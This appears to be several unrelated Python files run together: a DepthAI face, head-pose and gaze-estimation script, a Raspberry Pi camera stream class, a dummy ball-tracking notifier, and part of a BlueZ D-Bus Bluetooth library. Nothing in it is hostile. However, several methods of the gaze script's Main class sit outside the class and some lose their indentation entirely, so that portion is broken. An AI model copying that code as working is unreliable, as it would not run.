        # (Previously never initialized, and never checked by the loop.)
        self.ballTrackingEnabled = False

    def start_ball_tracking(self):
        """Start emitting fake coordinates on a daemon thread.

        Bug fix: the thread target must be the bound method itself, not the
        result of calling it -- `target=self.ball_tracking()` ran the
        infinite loop in the caller's thread and never returned.
        """
        print("Psudo ball tracking started.")
        self.ballTrackingEnabled = True
        t2 = threading.Thread(target=self.ball_tracking)
        t2.daemon = True
        t2.start()

    def ball_tracking(self):
        # Loop until stop_ball_tracking() clears the flag (was `while True`,
        # which made stop_ball_tracking() ineffective).
        while self.ballTrackingEnabled:
            self.push_notification("Location Updated:",
                                   x=random.random(),
                                   y=random.random())
            time.sleep(1)

    def stop_ball_tracking(self):
        """Ask the tracking loop to exit after its current iteration."""
        self.ballTrackingEnabled = False

    # Observer Functions
    def register(self, observer):
        """Subscribe *observer* exactly once."""
        if observer not in self.observers:
            self.observers.append(observer)

    def unregister(self, observer):
        """Remove *observer* if it is subscribed."""
        if observer in self.observers:
            self.observers.remove(observer)

    def unregister_all(self):
        """Drop every subscription (in place, preserving the list object)."""
        if self.observers:
            del self.observers[:]

    def push_notification(self, *args, **keywordargs):
        """Forward the given arguments to every observer's notify()."""
        for observer in self.observers:
            observer.notify(*args, **keywordargs)
|
main.py | import argparse
import queue
import threading
import signal
from pathlib import Path
import blobconverter
import cv2
import depthai
import numpy as np
from imutils.video import FPS
from math import cos, sin
# Command-line interface: pick exactly one inference source (camera or video).
parser = argparse.ArgumentParser()
parser.add_argument('-nd', '--no-debug', action="store_true", help="Prevent debug output")
parser.add_argument('-cam', '--camera', action="store_true", help="Use DepthAI 4K RGB camera for inference (conflicts with -vid)")
parser.add_argument('-vid', '--video', type=str, help="Path to video file to be used for inference (conflicts with -cam)")
parser.add_argument('-laz', '--lazer', action="store_true", help="Lazer mode")
args = parser.parse_args()

debug = not args.no_debug
# Default to the camera whenever no video path is supplied
camera = not args.video
if args.camera and args.video:
    raise ValueError("Incorrect command line parameters! \"-cam\" cannot be used with \"-vid\"!")
elif args.camera is False and args.video is None:
    raise ValueError("Missing inference source! Either use \"-cam\" to run on DepthAI camera or \"-vid <path>\" to run on video file")
def draw_3d_axis(image, head_pose, origin, size=50):
    """Draw a 3-D orientation gizmo (X red, Y green, Z blue) onto *image*.

    head_pose -- (yaw, pitch, roll) in degrees
    origin    -- (x, y) pixel position of the gizmo centre
    size      -- axis length in pixels
    Returns *image* (also modified in place by cv2.line).
    """
    # From https://github.com/openvinotoolkit/open_model_zoo/blob/b1ff98b64a6222cf6b5f3838dc0271422250de95/demos/gaze_estimation_demo/cpp/src/results_marker.cpp#L50
    origin_x,origin_y = origin
    # Convert degrees to radians
    yaw,pitch, roll = np.array(head_pose)*np.pi / 180
    sinY = sin(yaw)
    sinP = sin(pitch)
    sinR = sin(roll)
    cosY = cos(yaw)
    cosP = cos(pitch)
    cosR = cos(roll)
    # X axis (red)
    x1 = origin_x + size * (cosR * cosY + sinY * sinP * sinR)
    y1 = origin_y + size * cosP * sinR
    cv2.line(image, (origin_x, origin_y), (int(x1), int(y1)), (0, 0, 255), 3)
    # Y axis (green)
    x2 = origin_x + size * (cosR * sinY * sinP + cosY * sinR)
    y2 = origin_y - size * cosP * cosR
    cv2.line(image, (origin_x, origin_y), (int(x2), int(y2)), (0, 255, 0), 3)
    # Z axis (blue)
    x3 = origin_x + size * (sinY * cosP)
    y3 = origin_y + size * sinP
    cv2.line(image, (origin_x, origin_y), (int(x3), int(y3)), (255, 0, 0), 2)
    return image
def frame_norm(frame, bbox):
    """Scale normalized (0..1) bbox coordinates to pixel units of *frame*.

    Even indices are x-coordinates (scaled by frame width), odd indices are
    y-coordinates (scaled by frame height); inputs are clipped to [0, 1]
    and the result is returned as an integer ndarray.
    """
    height, width = frame.shape[0], frame.shape[1]
    scale = np.array([width if i % 2 == 0 else height for i in range(len(bbox))])
    clipped = np.clip(np.array(bbox), 0, 1)
    return (clipped * scale).astype(int)
def to_planar(arr: np.ndarray, shape: tuple) -> list:
    """Resize *arr* to *shape* and return its pixels flattened in planar
    (channel-first, CHW) order."""
    planar = cv2.resize(arr, shape).transpose(2, 0, 1)
    return list(planar.reshape(-1))
def to_tensor_result(packet):
    """Unpack an NN result packet into {layer_name: ndarray} with each
    array reshaped to the tensor's declared dims."""
    return {
        tensor.name: np.array(packet.getLayerFp16(tensor.name)).reshape(tensor.dims)
        for tensor in packet.getRaw().tensors
    }
def padded_point(point, padding, frame_shape=None):
    """Build a square box [x_min, y_min, x_max, y_max] of half-size
    *padding* centred on *point* (x, y).

    When *frame_shape* (height, width, ...) is given the box is clipped to
    the frame, and None is returned if the padded box lies entirely outside
    it.  Without *frame_shape* the raw, unclipped box is returned.

    Bug fix: the original clamped x-coordinates against frame_shape[0]
    (height) and y-coordinates against frame_shape[1] (width).  That was
    invisible on the square 300x300 preview but wrong for any non-square
    frame; axes are now matched correctly (x vs width, y vs height).
    """
    x, y = point[0], point[1]
    if frame_shape is None:
        return [
            x - padding,
            y - padding,
            x + padding,
            y + padding
        ]

    height, width = frame_shape[0], frame_shape[1]
    # Reject boxes that have no overlap with the frame at all.
    if (x - padding > width or y - padding > height
            or x + padding < 0 or y + padding < 0):
        print(f"Unable to create padded box for point {point} with padding {padding} and frame shape {frame_shape[:2]}")
        return None

    def clamp(val, dim):
        return max(0, min(val, dim))

    return [
        clamp(x - padding, width),
        clamp(y - padding, height),
        clamp(x + padding, width),
        clamp(y + padding, height)
    ]
def create_pipeline():
    """Build the DepthAI pipeline: face detection -> landmarks + head pose
    -> gaze estimation, sourced either from the on-device camera or from
    host-fed frames (XLinkIn) depending on the `camera` flag."""
    print("Creating pipeline...")
    pipeline = depthai.Pipeline()

    if camera:
        # On-device RGB camera, 300x300 preview matching the face NN input
        print("Creating Color Camera...")
        cam = pipeline.create(depthai.node.ColorCamera)
        cam.setPreviewSize(300, 300)
        cam.setResolution(depthai.ColorCameraProperties.SensorResolution.THE_1080_P)
        cam.setInterleaved(False)
        cam.setBoardSocket(depthai.CameraBoardSocket.RGB)
        cam_xout = pipeline.create(depthai.node.XLinkOut)
        cam_xout.setStreamName("cam_out")
        cam.preview.link(cam_xout.input)

    # NeuralNetwork
    print("Creating Face Detection Neural Network...")
    face_nn = pipeline.create(depthai.node.NeuralNetwork)
    face_nn.setBlobPath(blobconverter.from_zoo(name="face-detection-retail-0004", shaves=4))
    if camera:
        cam.preview.link(face_nn.input)
    else:
        # Video mode: host pushes frames in via XLinkIn
        face_in = pipeline.create(depthai.node.XLinkIn)
        face_in.setStreamName("face_in")
        face_in.out.link(face_nn.input)
    face_nn_xout = pipeline.create(depthai.node.XLinkOut)
    face_nn_xout.setStreamName("face_nn")
    face_nn.out.link(face_nn_xout.input)

    # NeuralNetwork
    print("Creating Landmarks Detection Neural Network...")
    land_nn = pipeline.create(depthai.node.NeuralNetwork)
    land_nn.setBlobPath(blobconverter.from_zoo(name="landmarks-regression-retail-0009", shaves=4))
    land_nn_xin = pipeline.create(depthai.node.XLinkIn)
    land_nn_xin.setStreamName("landmark_in")
    land_nn_xin.out.link(land_nn.input)
    land_nn_xout = pipeline.create(depthai.node.XLinkOut)
    land_nn_xout.setStreamName("landmark_nn")
    land_nn.out.link(land_nn_xout.input)

    # NeuralNetwork
    print("Creating Head Pose Neural Network...")
    pose_nn = pipeline.create(depthai.node.NeuralNetwork)
    pose_nn.setBlobPath(blobconverter.from_zoo(name="head-pose-estimation-adas-0001", shaves=4))
    pose_nn_xin = pipeline.create(depthai.node.XLinkIn)
    pose_nn_xin.setStreamName("pose_in")
    pose_nn_xin.out.link(pose_nn.input)
    pose_nn_xout = pipeline.create(depthai.node.XLinkOut)
    pose_nn_xout.setStreamName("pose_nn")
    pose_nn.out.link(pose_nn_xout.input)

    # NeuralNetwork
    print("Creating Gaze Estimation Neural Network...")
    gaze_nn = pipeline.create(depthai.node.NeuralNetwork)
    # Compile with mixed input precisions: FP16 angles, U8 eye crops
    path = blobconverter.from_zoo("gaze-estimation-adas-0002", shaves=4,
                                  compile_params=['-iop head_pose_angles:FP16,right_eye_image:U8,left_eye_image:U8'],
                                  )
    gaze_nn.setBlobPath(path)
    gaze_nn_xin = pipeline.create(depthai.node.XLinkIn)
    gaze_nn_xin.setStreamName("gaze_in")
    gaze_nn_xin.out.link(gaze_nn.input)
    gaze_nn_xout = pipeline.create(depthai.node.XLinkOut)
    gaze_nn_xout.setStreamName("gaze_nn")
    gaze_nn.out.link(gaze_nn_xout.input)

    return pipeline
class Main:
    def __init__(self, device):
        """Start the pipeline on *device* and set up queues + shared state
        read/written by the worker threads."""
        self.device = device
        print("Starting pipeline...")
        self.device.startPipeline()
        if camera:
            self.cam_out = self.device.getOutputQueue("cam_out")
        else:
            self.face_in = self.device.getInputQueue("face_in")
        if not camera:
            self.cap = cv2.VideoCapture(str(Path(args.video).resolve().absolute()))

        self.frame = None
        # Face boxes handed from face_thread to land_pose_thread
        self.face_box_q = queue.Queue()
        self.bboxes = []
        # Latest per-frame results published by the worker threads
        self.left_bbox = None
        self.right_bbox = None
        self.nose = None
        self.pose = None
        self.gaze = None
        self.running = True
        self.fps = FPS()
        self.fps.start()
def face_thread(self):
    """Worker: read face detections, crop faces and feed the landmark and
    head-pose networks; pass each face box on via face_box_q."""
    face_nn = self.device.getOutputQueue("face_nn")
    landmark_in = self.device.getInputQueue("landmark_in")
    pose_in = self.device.getInputQueue("pose_in")

    while self.running:
        if self.frame is None:
            continue
        try:
            bboxes = np.array(face_nn.get().getFirstLayerFp16())
        except RuntimeError as ex:
            continue
        # Detections come as flat rows of 7 values; keep boxes with
        # confidence (col 2) > 0.7 and their normalized coords (cols 3..6)
        bboxes = bboxes.reshape((bboxes.size // 7, 7))
        self.bboxes = bboxes[bboxes[:, 2] > 0.7][:, 3:7]

        for raw_bbox in self.bboxes:
            bbox = frame_norm(self.frame, raw_bbox)
            det_frame = self.frame[bbox[1]:bbox[3], bbox[0]:bbox[2]]

            land_data = depthai.NNData()
            land_data.setLayer("0", to_planar(det_frame, (48, 48)))
            landmark_in.send(land_data)

            pose_data = depthai.NNData()
            pose_data.setLayer("data", to_planar(det_frame, (60, 60)))
            pose_in.send(pose_data)

            self.face_box_q.put(bbox)
def land_pose_thread(self):
    """Worker: combine landmark + head-pose results, crop both eyes and
    feed the gaze-estimation network."""
    landmark_nn = self.device.getOutputQueue(name="landmark_nn", maxSize=1, blocking=False)
    pose_nn = self.device.getOutputQueue(name="pose_nn", maxSize=1, blocking=False)
    gaze_in = self.device.getInputQueue("gaze_in")

    while self.running:
        try:
            land_in = landmark_nn.get().getFirstLayerFp16()
        except RuntimeError as ex:
            continue

        try:
            # NOTE(review): timeout is in seconds, so this waits up to 100 s
            # for a matching face box -- confirm seconds (not ms) was meant.
            face_bbox = self.face_box_q.get(block=True, timeout=100)
        except queue.Empty:
            continue

        self.face_box_q.task_done()
        left = face_bbox[0]
        top = face_bbox[1]
        face_frame = self.frame[face_bbox[1]:face_bbox[3], face_bbox[0]:face_bbox[2]]
        # Landmarks are normalized to the face crop; shift to full-frame coords
        land_data = frame_norm(face_frame, land_in)
        land_data[::2] += left
        land_data[1::2] += top

        left_bbox = padded_point(land_data[:2], padding=30, frame_shape=self.frame.shape)
        if left_bbox is None:
            print("Point for left eye is corrupted, skipping nn result...")
            continue
        self.left_bbox = left_bbox

        right_bbox = padded_point(land_data[2:4], padding=30, frame_shape=self.frame.shape)
        if right_bbox is None:
            print("Point for right eye is corrupted, skipping nn result...")
            continue
        self.right_bbox = right_bbox

        self.nose = land_data[4:6]
        left_img = self.frame[self.left_bbox[1]:self.left_bbox[3], self.left_bbox[0]:self.left_bbox[2]]
        right_img = self.frame[self.right_bbox[1]:self.right_bbox[3], self.right_bbox[0]:self.right_bbox[2]]

        try:
            # The output of pose_nn is in YPR format, which is the required sequence input for pose in gaze
            # https://docs.openvinotoolkit.org/2020.1/_models_intel_head_pose_estimation_adas_0001_description_head_pose_estimation_adas_0001.html
            # https://docs.openvinotoolkit.org/latest/omz_models_model_gaze_estimation_adas_0002.html
            # ... three head pose angles – (yaw, pitch, and roll) ...
            values = to_tensor_result(pose_nn.get())
            self.pose = [
                values['angle_y_fc'][0][0],
                values['angle_p_fc'][0][0],
                values['angle_r_fc'][0][0]
            ]
        except RuntimeError as ex:
            continue

        gaze_data = depthai.NNData()
        gaze_data.setLayer("left_eye_image", to_planar(left_img, (60, 60)))
        gaze_data.setLayer("right_eye_image", to_planar(right_img, (60, 60)))
        gaze_data.setLayer("head_pose_angles", self.pose)
        gaze_in.send(gaze_data)
def gaze_thread(self):
gaze_nn = self.device.getOutputQueue("gaze_nn")
while self.running:
try:
self.gaze = np.array(gaze_nn.get().getFirstLayerFp16())
except RuntimeError as ex:
continue
def should_run(self):
if self.running:
return True if camera else self.cap.isOpened()
else:
return False
def get_frame(self, retries=0):
if camera:
return True, np.array(self.cam_out.get().getData()).reshape((3, 300, 300)).transpose(1, 2, 0).astype(np.uint8)
else:
read_correctly, new_frame = self.cap.read()
if not read_correctly or new_frame is None:
if retries < 5:
return self.get_frame(retries+1)
else:
print("Source closed, terminating...")
return False, None
else:
return read_correctly, new_frame
    def run(self):
        """Main loop: start the NN worker threads, then read, feed and
        display frames until the source ends or the user presses 'q'."""
        # One worker per pipeline stage; they communicate via device queues
        # and instance attributes (self.frame, self.gaze, ...).
        self.threads = [
            threading.Thread(target=self.face_thread),
            threading.Thread(target=self.land_pose_thread),
            threading.Thread(target=self.gaze_thread)
        ]
        for thread in self.threads:
            thread.start()
        while self.should_run():
            try:
                read_correctly, new_frame = self.get_frame()
            except RuntimeError:
                continue
            if not read_correctly:
                break
            self.fps.update()
            self.frame = new_frame
            self.debug_frame = self.frame.copy()
            if not camera:
                # Video-file mode: frames must be sent to the device manually.
                nn_data = depthai.NNData()
                nn_data.setLayer("data", to_planar(self.frame, (300, 300)))
                self.face_in.send(nn_data)
            if debug:  # visualisation of the face / gaze results
                if self.gaze is not None and self.left_bbox is not None and self.right_bbox is not None:
                    # Eye centres (right/left) from the eye bounding boxes.
                    re_x = (self.right_bbox[0] + self.right_bbox[2]) // 2
                    re_y = (self.right_bbox[1] + self.right_bbox[3]) // 2
                    le_x = (self.left_bbox[0] + self.left_bbox[2]) // 2
                    le_y = (self.left_bbox[1] + self.left_bbox[3]) // 2
                    x, y = (self.gaze * 100).astype(int)[:2]
                    if args.lazer:
                        # Draw fading red "laser beams" along the gaze vector
                        # (thicker, dimmer lines first, thin bright line last).
                        beam_img = np.zeros(self.debug_frame.shape, np.uint8)
                        for t in range(10)[::-2]:
                            cv2.line(beam_img, (re_x, re_y), ((re_x + x*100), (re_y - y*100)), (0, 0, 255-t*10), t*2)
                            cv2.line(beam_img, (le_x, le_y), ((le_x + x*100), (le_y - y*100)), (0, 0, 255-t*10), t*2)
                        self.debug_frame |= beam_img
                    else:
                        cv2.arrowedLine(self.debug_frame, (le_x, le_y), (le_x + x, le_y - y), (255, 0, 255), 3)
                        cv2.arrowedLine(self.debug_frame, (re_x, re_y), (re_x + x, re_y - y), (255, 0, 255), 3)
                if not args.lazer:
                    # Overlay detections: face boxes, nose point, eye boxes
                    # and the 3D head-pose axes.
                    for raw_bbox in self.bboxes:
                        bbox = frame_norm(self.frame, raw_bbox)
                        cv2.rectangle(self.debug_frame, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (10, 245, 10), 2)
                    if self.nose is not None:
                        cv2.circle(self.debug_frame, (self.nose[0], self.nose[1]), 2, (0, 255, 0), thickness=5, lineType=8, shift=0)
                    if self.left_bbox is not None:
                        cv2.rectangle(self.debug_frame, (self.left_bbox[0], self.left_bbox[1]), (self.left_bbox[2], self.left_bbox[3]), (245, 10, 10), 2)
                    if self.right_bbox is not None:
                        cv2.rectangle(self.debug_frame, (self.right_bbox[0], self.right_bbox[1]), (self.right_bbox[2], self.right_bbox[3]), (245, 10, 10), 2)
                    if self.pose is not None and self.nose is not None:
                        draw_3d_axis(self.debug_frame, self.pose, self.nose)
                if camera:
                    cv2.imshow("Camera view", self.debug_frame)
                else:
                    # Resize video frames to a fixed 900px width, keeping
                    # the aspect ratio.
                    aspect_ratio = self.frame.shape[1] / self.frame.shape[0]
                    cv2.imshow("Video view", cv2.resize(self.debug_frame, (int(900), int(900 / aspect_ratio))))
                if cv2.waitKey(1) == ord('q'):
                    cv2.destroyAllWindows()
                    break
        # Shutdown: report FPS, release the source, and flag the workers
        # (which poll self.running) to exit.
        self.fps.stop()
        print("FPS: {:.2f}".format(self.fps.fps()))
        if not camera:
            self.cap.release()
        cv2.destroyAllWindows()
        for i in range(1, 5):  # https://stackoverflow.com/a/25794701/5494277
            cv2.waitKey(1)
        self.running = False
# Script entry point: build the pipeline, run the app on the device, then
# wait for the worker threads to finish.
with depthai.Device(create_pipeline()) as device:
    app = Main(device)
    # Register a graceful CTRL+C shutdown
    def signal_handler(sig, frame):
        app.running = False
    signal.signal(signal.SIGINT, signal_handler)
    app.run()
# run() clears app.running on exit, so the worker threads terminate and
# these joins return promptly.
for thread in app.threads:
    thread.join()
|
PiVideoStream.py | # borrowed from imutils https://github.com/jrosebr1/imutils/blob/master/imutils/video/pivideostream.py
# import the necessary packages
from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
class PiVideoStream:
    """Threaded Raspberry Pi camera reader (adapted from imutils).

    A daemon thread continuously pulls BGR frames from the PiCamera so
    that ``read()`` always returns the latest frame without blocking.
    """

    def __init__(self, resolution=(320, 240), framerate=4):
        """Configure the camera and open a continuous BGR capture stream."""
        self.camera = PiCamera()
        self.camera.resolution = resolution
        self.camera.framerate = framerate
        # Fixed white balance / exposure settings (tuned for indoor light).
        self.camera.awb_mode = 'fluorescent'
        self.camera.iso = 800
        self.camera.exposure_compensation = 25
        self.camera.brightness = 65
        self.rawCapture = PiRGBArray(self.camera, size=resolution)
        self.stream = self.camera.capture_continuous(
            self.rawCapture, format="bgr", use_video_port=True)
        # Latest frame and the flag the reader thread polls to shut down.
        self.frame = None
        self.stopped = False

    def start(self):
        """Launch the background frame-reader thread and return self."""
        worker = Thread(target=self.update, args=())
        worker.daemon = True
        worker.start()
        return self

    def update(self):
        """Reader loop: keep capturing frames until stop() is requested."""
        for capture in self.stream:
            # Store the frame and reset the buffer for the next capture.
            self.frame = capture.array
            self.rawCapture.truncate(0)
            if self.stopped:
                # Release all camera resources before the thread exits.
                self.stream.close()
                self.rawCapture.close()
                self.camera.close()
                return

    def read(self):
        """Return the most recently captured frame (None before the first)."""
        return self.frame

    def stop(self):
        """Signal the reader thread to shut down and release the camera."""
        self.stopped = True
|
dbusted.py | """
bluew.dbusted
~~~~~~~~~~~~
This modlule contains an implementation of an EngineBluew class,
using the bluez D-Bus API.
:copyright: (c) 2017 by Ahmed Alsharif.
:license: MIT, see LICENSE for more details.
"""
import logging
import threading
import time
from typing import List, Optional, Callable # pylint: disable=W0611
from dbus.mainloop.glib import DBusGMainLoop
import dbus
from gi.repository import GLib
from bluew.dbusted.interfaces import BluezInterfaceError as IfaceError
from bluew.dbusted.interfaces import (BluezGattCharInterface,
BluezAgentManagerInterface,
BluezObjectInterface,
BluezAdapterInterface,
BluezDeviceInterface,
Controller,
Device,
BLECharacteristic,
BLEService,
dbus_object_parser)
from bluew.errors import (BluewError,
NoControllerAvailable,
ControllerSpecifiedNotFound,
PairError,
DeviceNotAvailable,
ControllerNotReady,
ReadWriteNotifyError,
InvalidArgumentsError)
from bluew.engine import EngineBluew
from bluew.dbusted.decorators import (mac_to_dev,
check_if_available,
check_if_connected,
check_if_not_paired,
handle_errors)
class DBusted(EngineBluew):
    """
    DBusted is an EngineBluew implementation, using the Bluez D-Bus API.

    The class is a singleton: all instances share one system-bus connection
    and one GLib main loop running in a background thread; ``__count``
    tracks live handles so the loop is only torn down when the last one
    calls ``stop_engine``.
    """

    __instance = None  # type: Optional[DBusted]
    __loop = None  # type: Optional[GLib.MainLoop]
    __thread = None  # type: Optional[threading.Thread]
    __bus = None  # type: Optional[dbus.SystemBus]
    __count = 0  # number of live DBusted handles

    def __new__(cls, *args, **kwargs):
        # pylint: disable=W0612,W0613
        DBusted.__count += 1
        if DBusted.__instance is None:
            DBusted.__instance = object.__new__(cls)
            DBusGMainLoop(set_as_default=True)
            DBusted.__bus = dbus.SystemBus()
            # Run the GLib main loop in the background so D-Bus signals
            # (e.g. characteristic notifications) get dispatched.
            DBusted.__thread = threading.Thread(target=DBusted._start_loop)
            DBusted.__thread.start()
        return DBusted.__instance

    def __init__(self, *args, **kwargs):
        name = "DBusted"
        version = "0.3.8"
        kwargs['name'] = name
        kwargs['version'] = version
        super().__init__(*args, **kwargs)
        self.cntrl = kwargs.get('cntrl', None)
        self.timeout = kwargs.get('timeout', 5)
        self._bus = DBusted.__bus
        self._init_cntrl()
        self.logger = logging.getLogger(__name__)

    def __enter__(self):
        self.start_engine()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.stop_engine()

    @staticmethod
    def _start_loop():
        """Run the GLib main loop; restart it if interrupted by CTRL+C."""
        DBusted.__loop = GLib.MainLoop()
        running = True
        while running:
            try:
                running = False
                DBusted.__loop.run()
            except KeyboardInterrupt:
                running = True

    def _init_cntrl(self):
        """Pick a default controller, or validate the one requested."""
        controllers = self.get_controllers()
        if self.cntrl is None:
            if not controllers:
                self.stop_engine()
                raise NoControllerAvailable()
            cntrl = self._strip_cntrl_path(controllers[0])
            self.cntrl = cntrl
        else:
            paths = list(map(self._strip_cntrl_path, controllers))
            if self.cntrl not in paths:
                self.stop_engine()
                raise ControllerSpecifiedNotFound()

    @property
    def devices(self):
        """A property to get devices nearby."""
        # NOTE(review): discovery is started here but not stopped; callers
        # appear to rely on the scan staying active — confirm before changing.
        self._start_scan()
        boiface = BluezObjectInterface(self._bus)
        return boiface.get_devices()

    @property
    def controllers(self):
        """A property to get controllers available."""
        boiface = BluezObjectInterface(self._bus)
        return boiface.get_controllers()

    @staticmethod
    def _strip_cntrl_path(cntrl):
        """Return the controller name (e.g. 'hci0') from its object path."""
        path = getattr(cntrl, 'Path')
        return path.replace('/org/bluez/', '')

    def start_engine(self) -> None:
        """
        Overriding EngineBluew's start_engine method. This method gets called
        to init the engine. We register here an agent with bluez during the
        initialization. DBusted is a singleton, and so we only need to init
        if it's the first instance of DBusted.
        :return: None.
        """
        if DBusted.__count == 1:
            pass
            # self._register_agent()

    def _register_agent(self):
        """Register a pairing agent with bluez."""
        amiface = BluezAgentManagerInterface(self._bus)
        return amiface.register_agent()

    def stop_engine(self) -> None:
        """
        Overriding EngineBluew's stop_engine method. This method gets called
        when the engine is not needed any more. Since DBusted is a singleton
        we should only destroy things when all instances are gone. Otherwise
        the engine should keep on running.
        :return: None.
        """
        DBusted.__count -= 1
        if not DBusted.__count:
            # self._unregister_agent()
            DBusted.__loop.quit()
            DBusted.__instance = None
            DBusted.__loop = None
            DBusted.__thread = None
            DBusted.__bus = None

    def _unregister_agent(self):
        """Unregister the pairing agent from bluez."""
        amiface = BluezAgentManagerInterface(self._bus)
        return amiface.unregister_agent()

    @mac_to_dev
    @check_if_available
    @handle_errors
    def connect(self, mac: str) -> None:
        """
        Overriding EngineBluew's connect method.
        :param mac: Device path. @mac_to_dev takes care of getting the proper
        path from the device's mac address.
        :return: True if succeeded, False otherwise..
        """
        deviface = BluezDeviceInterface(self._bus, mac, self.cntrl)
        deviface.connect_device()

    @mac_to_dev
    @check_if_connected
    @check_if_available
    @handle_errors
    def disconnect(self, mac: str) -> None:
        """
        Overriding EngineBluew's disconnect method.
        :param mac: Device path. @mac_to_dev takes care of getting the proper
        path from the device's mac address.
        :return: True if succeeded, False otherwise..
        """
        deviface = BluezDeviceInterface(self._bus, mac, self.cntrl)
        deviface.disconnect_device()

    @mac_to_dev
    @check_if_available
    @check_if_not_paired
    @handle_errors
    def pair(self, mac: str) -> None:
        """
        Overriding EngineBluew's pair method.
        :param mac: Device path. @mac_to_dev takes care of getting the proper
        path from the device's mac address.
        :return: True if succeeded, False otherwise..
        """
        deviface = BluezDeviceInterface(self._bus, mac, self.cntrl)
        deviface.pair_device()
        paired = self._is_device_paired_timeout(mac)
        if not paired:
            raise PairError(self.name, self.version)

    @mac_to_dev
    @handle_errors
    def remove(self, mac: str) -> None:
        """
        Overriding EngineBluew's remove method.
        :param mac: Device path. @mac_to_dev takes care of getting the proper
        path from the device's mac address.
        :return: True if succeeded, False otherwise..
        """
        adiface = BluezAdapterInterface(self._bus, self.cntrl)
        adiface.remove_device(mac)

    def remove_all(self) -> None:
        """Remove all devices."""
        devices = self._get_devices()
        for dev in devices:
            self.remove(getattr(dev, 'Address'))

    def get_controllers(self) -> List[Controller]:
        """
        Overriding EngineBluew's get_controllers method.
        :return: List of controllers available.
        """
        boiface = BluezObjectInterface(self._bus)
        return boiface.get_controllers()

    def get_devices(self) -> List[Device]:
        """
        Overriding EngineBluew's get_devices method.
        :return: List of devices available.
        """
        # Start from a clean slate, scan for self.timeout seconds, then
        # return whatever bluez has discovered.
        self.remove_all()
        self._start_scan()
        get_devices = self._tout(self._get_devices,
                                 self.timeout,
                                 lambda x: False)
        devices = get_devices()
        self._stop_scan()
        return devices

    def _get_devices(self) -> List[Device]:
        """Return the devices bluez currently knows about (no scanning)."""
        boiface = BluezObjectInterface(self._bus)
        devices = boiface.get_devices()
        return devices

    @mac_to_dev
    def get_services(self, mac: str) -> List[BLEService]:
        """
        Overriding EngineBluew's get_services method.
        :param mac: Device path. @mac_to_dev takes care of getting the proper
        path from the device's mac address.
        :return: List of BLE services available.
        """
        boiface = BluezObjectInterface(self._bus)
        return boiface.get_services(mac)

    @mac_to_dev
    def get_chrcs(self, mac: str) -> List[BLECharacteristic]:
        """
        Overriding EngineBluew's get_chrcs method.
        :param mac: Device path. @mac_to_dev takes care of getting the proper
        path from the device's mac address.
        :return: List of BLE characteristics available.
        """
        boiface = BluezObjectInterface(self._bus)
        return boiface.get_characteristics(mac)

    @mac_to_dev
    @check_if_available
    @handle_errors
    def info(self, mac):
        """
        Overriding EngineBluew's info method.
        :param mac: Device path. @mac_to_dev takes care of getting the proper
        path from the device's mac address.
        :return: Device object.
        """
        devices = self._get_devices()
        device = list(filter(lambda x: mac in x.Path, devices))[0]
        return device

    @mac_to_dev
    @check_if_available
    @handle_errors
    def trust(self, mac: str) -> None:
        """
        Overriding EngineBluew's trust method.
        :param mac: Device path. @mac_to_dev takes care of getting the proper
        path from the device's mac address.
        :return: True if succeeded, False otherwise..
        """
        deviface = BluezDeviceInterface(self._bus, mac, self.cntrl)
        deviface.trust_device()

    @mac_to_dev
    @check_if_available
    @handle_errors
    def distrust(self, mac: str) -> None:
        """
        Overriding EngineBluew's untrust method.
        :param mac: Device path. @mac_to_dev takes care of getting the proper
        path from the device's mac address.
        :return: True if succeeded, False otherwise..
        """
        deviface = BluezDeviceInterface(self._bus, mac, self.cntrl)
        deviface.distrust_device()

    def _start_scan(self) -> None:
        """Start device discovery on the controller."""
        adiface = BluezAdapterInterface(self._bus, self.cntrl)
        adiface.start_discovery()

    def _stop_scan(self) -> None:
        """Stop device discovery on the controller."""
        adiface = BluezAdapterInterface(self._bus, self.cntrl)
        adiface.stop_discovery()

    @mac_to_dev
    @check_if_available
    @handle_errors
    def read_attribute(self, mac: str, attribute: str) -> List[bytes]:
        """
        Overriding EngineBluew's read_attribute method.
        :param mac: Device path. @mac_to_dev takes care of getting the proper
        path from the device's mac address.
        :param attribute: UUID of the BLE attribute.
        :return: Value of attribute, raise exception otherwise.
        """
        path = self._uuid_to_path(attribute, mac)
        gattchrciface = BluezGattCharInterface(self._bus, path)
        return dbus_object_parser(gattchrciface.read_value())

    @mac_to_dev
    @check_if_available
    @handle_errors
    def write_attribute(self, mac: str, attribute: str,
                        data: List[int]) -> None:
        """
        Overriding EngineBluew's write_attribute method.
        :param mac: Device path. @mac_to_dev takes care of getting the proper
        path from the device's mac address.
        :param attribute: UUID of the BLE attribute.
        :param data: The data you want to write.
        :return: True if succeeded, False otherwise..
        """
        path = self._uuid_to_path(attribute, mac)
        gattchrciface = BluezGattCharInterface(self._bus, path)
        gattchrciface.write_value(data)

    @mac_to_dev
    @check_if_available
    @handle_errors
    def notify(self, mac: str, attribute: str, handler: Callable) -> None:
        """
        Overriding EngineBluew's notify method.
        :param mac: Device path. @mac_to_dev takes care of getting the proper
        path from the device's mac address.
        :param attribute: UUID of the BLE attribute.
        :param handler: A callback function with the values returned by the
        notifications.
        :return: True if succeeded, False otherwise..
        """
        path = self._uuid_to_path(attribute, mac)
        gattchrciface = BluezGattCharInterface(self._bus, path)
        handler = self._handle_notification(handler)
        gattchrciface.start_notify(handler)

    @mac_to_dev
    @check_if_available
    @handle_errors
    def stop_notify(self, mac: str, attribute: str) -> None:
        """
        Overriding EngineBluew's stop_notify method.
        :param mac: Device path. @mac_to_dev takes care of getting the proper
        path from the device's mac address.
        :param attribute: UUID of the BLE attribute.
        :return: True if succeeded, False otherwise..
        """
        path = self._uuid_to_path(attribute, mac)
        gattchrciface = BluezGattCharInterface(self._bus, path)
        gattchrciface.stop_notify()

    def _handle_errors(self, exp: IfaceError, *args, **kwargs) -> None:
        """Map a bluez interface error to a recovery action or bluew error."""
        auth_timeout = exp.error_name == IfaceError.BLUEZ_AUTH_TIMEOUT_ERR
        auth_failed = exp.error_name == IfaceError.BLUEZ_AUTH_FAILED_ERR
        auth_rejected = exp.error_name == IfaceError.BLUEZ_AUTH_REJECTED_ERR
        if exp.error_name == IfaceError.BLUEZ_NOT_CONNECTED_ERR:
            self.connect(args[0], **kwargs)
        elif exp.error_name == IfaceError.NOT_PAIRED:
            self.pair(args[0], **kwargs)
        elif exp.error_name == IfaceError.BLUEZ_NOT_SUPPORTED_ERR:
            self.stop_engine()
